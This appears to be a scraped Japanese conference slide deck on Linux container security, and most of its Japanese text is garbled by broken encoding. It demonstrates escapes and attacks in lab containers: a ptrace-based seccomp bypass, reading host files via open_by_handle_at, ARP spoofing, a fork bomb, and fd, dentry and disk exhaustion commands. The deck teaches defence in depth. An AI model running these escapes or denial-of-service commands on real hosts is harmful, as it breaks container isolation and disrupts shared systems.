    wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ
    wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ
    wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

    View full-size slide

  95. TFDDPNQΛCZQBTTͯ͠ΈΑ͏
    root@sample1:~/# ls
    bypass_seccomp.c
    root@sample1:~/# mkdir dir
    Bad system call
    root@sample1:~/# gcc bypass_seccomp.c
    root@sample1:~/# ./a.out
    root@sample1:~/# ls -al

    drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ

    View full-size slide

  96. NLEJS

    TFDDPNQ
    Bad system call

    View full-size slide

  97. HFUQJE

    TFDDPNQ QUSBDF
    getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ
    mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ
    NLEJS

    View full-size slide

  98. QUSBDF

    kill(getpid(), SIGSTOP);
    syscall(SYS_getpid, SYS_mkdir, "dir", 0777);
    if (regs.orig_rax == SYS_getpid) {
    regs.orig_rax = regs.rdi;
    regs.rdi = regs.rsi;
    regs.rsi = regs.rdx;
    regs.rdx = regs.r10;
    ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    }

    View full-size slide

  99. -JOVY$BQBCJMJUZ

    View full-size slide

  100. wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ
    wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ
    DBQBCJMJUZ
    $"1@4:4@"%.*/
    $"1@4:4@$)3005
    $"1@4:4@153"$&
    $"1@/&5@3"8
    $"1@4:4@#005
    NPVOU
    ͳͲ
    DISPPU

    QUSBDF

    3"8ιέοτ QJOHͳͲ

    SFCPPU
    ͱLFYFD@MPBE

    -JOVY$BQBCJMJUZ

    View full-size slide

  101. έΠύϏϦςΟΛମݧ͠Α͏
    $ haconiwa start sample3.haco
    root@sample1:/# ping 8.8.8.8
    PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms
    ^C
    --- 8.8.8.8 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms

    View full-size slide

  102. έΠύϏϦςΟΛମݧ͠Α͏
    root@sample1:/# mount /dev/sda1 /mnt/
    root@sample1:/# cat /mnt/etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

    View full-size slide

  103. έΠύϏϦςΟΛ%301
    $ cat sample3.haco

    config.capabilities.allow :all
    config.capabilities.drop "cap_sys_admin"
    config.capabilities.drop "cap_net_raw"

    View full-size slide

  104. ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ
    $ haconiwa start sample3.haco
    root@sample1:/# ping 8.8.8.8
    ping: icmp open socket: Operation not permitted
    root@sample1:/# mount /dev/sda1 /mnt/
    mount: permission denied

    View full-size slide

  105. TZTDBMM
    LFYFD@MPBE
    JOJU@NPEVMF
    pOJU@NPEVMF
    EFMFUF@NPEVMF
    PQFO@CZ@IBOEMF@BU
    ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ
    ΧʔωϧϞδϡʔϧΛϩʔυ
    ΧʔωϧϞδϡʔϧΛϩʔυ
    ΧʔωϧϞδϡʔϧΛ࡟আ
    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

    View full-size slide

  106. PQFO@CZ@IBOEMF@BU
    wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ
    •CAP_DAC_READ_SEARCH
    wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ
    wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ
    ʹΞΫηεՄೳ

    View full-size slide

  107. PQFO@CZ@IBOEMF@BU
    int open_by_handle_at(
    int mount_fd,
    struct file_handle *handle,
    int flags);
    struct file_handle {
    unsigned int handle_bytes; /* Size of f_handle [in, out] */
    int handle_type; /* Handle type [out] */
    unsigned char f_handle[0]; /* File identifier */
    };

    View full-size slide

  108. PQFO@CZ@IBOEMF@BU
    struct file_handle {
    unsigned int handle_bytes; /* Size of f_handle [in, out] */
    int handle_type; /* Handle type [out] */
    unsigned char f_handle[0]; /* File identifier */
    };
    ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

    View full-size slide

  109. PQFO@CZ@IBOEMF@BU
    $ stat /etc/passwd
    File: '/etc/passwd'
    Size: 1724 Blocks: 8 IO Block: 4096 regular file
    Device: 801h/2049d Inode: 23125 Links: 1
    struct my_file_handle h = {
    .handle_bytes = 8,
    .handle_type = 1,
    // 23125 = 5a 55
    .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
    };

    View full-size slide

  110. PQFO@CZ@IBOEMF@BU
    $ stat /etc/passwd
    File: '/etc/passwd'
    Size: 1724 Blocks: 8 IO Block: 4096 regular file
    Device: 801h/2049d Inode: 57824 Links: 1
    $ haconiwa start sample4.c
    root@sample1:/# vim read_passwd.c
    // Change ex) 57824= e1 e0
    .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
    };

    View full-size slide

  111. PQFO@CZ@IBOEMF@BU
    root@sample1:/# gcc read_passwd.c
    root@sample1:/# ./a.out
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

    View full-size slide

  112. ϗετͷγΣϧΛऔΔ
    root@sample1:/# gcc breakout.c
    root@sample1:/# ./a.out
    $ sudo haconiwa start demo1.haco

    View full-size slide

  113. εΠενʔζϞσϧ
    w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ
    w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ
    w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ
    w TFDDPNQ͕#ZQBTT͞Εͯ΋$BQBCJMJUZͰ๷͙



    View full-size slide

  114. ίϯςφͷωοτϫʔΫ

    View full-size slide

  115. $POUBJOFS/FUXPSL
    wLXD͸σϑΥϧτઃఆͰ͸
    ϒϦοδ͕࡞੒͞ΕΔ
    eth0 lxdbr0
    veth0 eth0
    veth0 eth0
    $POUBJOFS
    $POUBJOFS
    #SJEHF

    View full-size slide

  116. #SJEHF/FUXPSL
    $ ip addr show dev lxdbr0
    4: lxdbr0: mtu 1500 qdisc noqueue
    state UP group default qlen 1000
    link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.152.207.1/24 scope global lxdbr0
    valid_lft forever preferred_lft forever
    inet6 fd2e:8281:6de5:9841::1/64 scope global
    valid_lft forever preferred_lft forever
    inet6 fe80::281a:c0ff:fed1:4b28/64 scope link
    valid_lft forever preferred_lft forever

    View full-size slide

  117. $POUBJOFS/FUXPSL
    wίϯςφΛϗεςΟϯά͍ͯ͠Δ
    ৔߹ɺΠϯλʔωοτ͔Βτϥ
    ϑΟοΫΛड͚Δ
    w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ
    ϑΟοΫΛ๣डͰ͖ͨΒʜʁ
    4500 0088 7f79 4000
    4006 7980 0a6b 9601
    0a6b 969f 8ef6 3039
    53dd 5b1c 8615 bd1a
    8018 00e5 41f1 0000

    View full-size slide

  118. "314QPPpOH
    w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ
    άΛมߋ͢Δ
    w"31ςʔϒϧ ΞυϨεରরද
    Λ
    ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ
    wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ
    "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕
    Ͱ͖Δ
    4500 0088 7f79 4000
    4006 7980 0a6b 9601
    0a6b 969f 8ef6 3039
    53dd 5b1c 8615 bd1a
    8018 00e5 41f1 0000

    View full-size slide

  119. "315BCMF
    vagrant@ubuntu-xenial:~$ lxc list
    attacker | RUNNING | 10.128.193.110 (eth0)
    victim | RUNNING | 10.128.193.231 (eth0)
    vagrant@ubuntu-xenial:~$ arp -a
    ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
    ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

    View full-size slide

  120. ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ
    vagrant@ubuntu-xenial:~$ lxc exec attacker bash
    root@test1:~# ping 10.128.193.231 # victim ip
    PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data.
    64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms
    ^C
    --- 10.128.193.231 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

    View full-size slide

  121. "314QPPpOH
    root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null &
    [1] 1619
    root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null &
    [2] 1620

    View full-size slide

  122. "315BCMF
    vagrant@ubuntu-xenial:~$ arp -a
    ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
    ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

    View full-size slide

  123. ύέοτΛΩϟϓνϟ͢Δ
    root@attacker:~# tcpdump -i any -vv -w test.pcap
    vagrant@ubuntu-xenial:~/shared$ curl 10.128.193.231

    View full-size slide

  124. औಘͨ͠ύέοτΛݟͯΈΔ
    $ lxc file pull attacker/root/test.pcap ./
    $ tcpdump -X tcp port 80 -r test.pcap
    0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g....
    0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........
    0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....]..........
    0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1
    0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128
    0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A
    0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47.
    0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*..
    0x0080: 0d0a ..

    View full-size slide

  125. ͦͷଞͷ"UUBDL4VSGBDF

    View full-size slide

  126. ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ
    root@sample1:/# dmesg
    [ 311.470895] EXT4-fs (sda1): error count since last fsck: 28
    [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516:
    htree_dirblock_to_tree:986: inode 542086: block 1069691
    [ 311.470944] EXT4-fs (sda1): last error at time 1537928843:
    htree_dirblock_to_tree:986: inode 278756: block 531449

    root@06399a7a8814:/# dmesg -C
    root@06399a7a8814:/# dmesg

    View full-size slide

  127. OFHBUJWFEFOUSZͷେྔੜ੒
    root@sample1:/# perl -e 'stat("/$_") for 1..100000000’
    vagrant@ubuntu-xenial:~$ sudo slabtop
    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%)
    Active / Total Slabs (% used) : 197606 / 197606 (100.0%)
    Active / Total Caches (% used) : 78 / 122 (63.9%)
    Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%)
    Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K
    OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME
    4050564 4050564 100% 0.19K 192884 21 771536K dentry

    View full-size slide

  128. 'JMF%FTDSJQUPSΛେྔੜ੒
    w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸
    ্ݶ͕͋Γɺ/proc/sys/fs/file-
    maxͰ֬ೝͰ͖Δɻ
    wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺
    ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ
    VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋
    Өڹ͕ੜ͡Δɻ
    for(i=0; i=99198; i++) {
    sprintf(buf, “/tmp/%d", i);
    int fd = open(buf, O_CREAT);
    if( fd == -1 ){
    printf("max fd %d\n”, i);
    break;
    }
    }
    for(;;);

    View full-size slide

  129. GPSLCPNC
    $ :(){ :|: & };:
    $ for i in {1..9999}; do sleep infinity & done

    View full-size slide

  130. σΟεΫ༰ྔ
    $ fallocate -l 20g big_file
    • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ
    ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ
    $ dd if=/dev/zero of=tempfile bs=20GB count=10

    View full-size slide

  131. ·ͱΊ
    IUUQTqJDLSQ;[

    View full-size slide

  132. ·ͱΊ
    w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ
    wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ
    wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢
    w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ
    w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ

    w$7&

    View full-size slide

  133. ܅΋ϖύϘͰಇ͔ͳ͍͔ʁ
    ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU

    View full-size slide